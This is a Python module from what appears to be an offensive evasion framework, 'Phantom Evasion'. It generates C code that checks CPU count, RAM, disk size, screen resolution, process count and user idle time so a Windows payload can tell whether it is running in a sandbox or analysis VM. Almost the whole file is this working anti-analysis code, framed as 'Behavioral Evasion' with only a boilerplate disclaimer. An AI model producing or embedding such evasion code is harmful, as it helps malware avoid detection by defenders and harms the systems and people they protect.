"""
Phantom Evasion - Resource-Based Sandbox Detection

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_resource_check() -> Dict[str, Any]:
    """Generate C code for resource-based sandbox/VM detection.

    Checks performed:
        - CPU core count (sandboxes typically have 1–2 cores)
        - Physical RAM (sandboxes typically have < 4 GB)
        - Total disk size on C:\\ (sandboxes typically have < 60 GB)
        - Screen resolution (sandboxes often use non-standard resolutions)
        - Number of running processes (sandboxes have very few)
        - Recent user activity via ``GetLastInputInfo`` idle time

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
// Resource-Based Sandbox Detection – generated by Phantom Evasion
// Layer 4 – Behavioral Evasion
// Inspects host resources to determine whether execution is occurring
// inside a sandbox or automated analysis environment.

#ifndef PHANTOM_RESOURCE_CHECK_INCLUDED
#define PHANTOM_RESOURCE_CHECK_INCLUDED

#include <windows.h>
#include <tlhelp32.h>
#include <stdint.h>

// ── CPU core count ─────────────────────────────────────────────────────────────
static BOOL few_cpu_cores(void) {
    SYSTEM_INFO si = {0};
    GetSystemInfo(&si);
    // Sandboxes commonly expose only 1 or 2 logical processors
    return si.dwNumberOfProcessors < 2;
}

// ── Physical RAM ───────────────────────────────────────────────────────────────
static BOOL low_physical_ram(void) {
    MEMORYSTATUSEX ms = { .dwLength = sizeof(ms) };
    GlobalMemoryStatusEx(&ms);
    // Sandboxes commonly have less than 4 GB of physical RAM
    return ms.ullTotalPhys < (4ULL * 1024 * 1024 * 1024);
}

// ── Disk size ──────────────────────────────────────────────────────────────────
static BOOL small_disk_size(void) {
    ULARGE_INTEGER free_bytes, total_bytes, total_free;
    if (!GetDiskFreeSpaceExW(L"C:\\", &free_bytes, &total_bytes, &total_free))
        return FALSE;
    // Sandboxes commonly use thin-provisioned disks smaller than 60 GB
    return total_bytes.QuadPart < (60ULL * 1024 * 1024 * 1024);
}

// ── Screen resolution ──────────────────────────────────────────────────────────
static BOOL non_standard_resolution(void) {
    int width  = GetSystemMetrics(SM_CXSCREEN);
    int height = GetSystemMetrics(SM_CYSCREEN);
    // Common sandbox resolutions: 800x600, 1024x768
    // Real workstations typically use 1280x800 or higher
    return (width < 1280 || height < 800);
}

// ── Running process count ──────────────────────────────────────────────────────
static BOOL too_few_processes(void) {
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE) return FALSE;

    PROCESSENTRY32 pe = { .dwSize = sizeof(pe) };
    DWORD count = 0;

    if (Process32First(hSnap, &pe)) {
        do { count++; } while (Process32Next(hSnap, &pe));
    }
    CloseHandle(hSnap);
    // Real Windows systems usually have 50+ processes at idle
    return count < 30;
}

// ── User-activity idle time ────────────────────────────────────────────────────
static BOOL no_recent_user_activity(void) {
    LASTINPUTINFO lii = { .cbSize = sizeof(lii) };
    if (!GetLastInputInfo(&lii)) return FALSE;
    // Use GetTickCount64() to avoid the ~49.7 day wraparound of GetTickCount()
    ULONGLONG now = GetTickCount64();
    ULONGLONG last = (ULONGLONG)lii.dwTime;
    // Account for potential 32-bit wraparound of lii.dwTime
    ULONGLONG idle_ms = (now > last) ? (now - last) : (now + (0x100000000ULL - last));
    // If no user input for more than 10 minutes → likely automated environment
    return idle_ms > (10ULL * 60 * 1000);
}

// ── Master resource check: TRUE if environment looks like a sandbox ────────────
static BOOL is_sandbox_by_resources(void) {
    if (few_cpu_cores())             return TRUE;
    if (low_physical_ram())          return TRUE;
    if (small_disk_size())           return TRUE;
    if (non_standard_resolution())   return TRUE;
    if (too_few_processes())         return TRUE;
    if (no_recent_user_activity())   return TRUE;
    return FALSE;
}

#endif /* PHANTOM_RESOURCE_CHECK_INCLUDED */
"""

    return {
        "code": code,
        "description": (
            "Resource-based sandbox detection: CPU cores, RAM, disk size, "
            "screen resolution, process count, user-activity idle time"
        ),
        "layer": "Layer 4 - Behavioral Evasion",
        "name": "resource_check",
    }
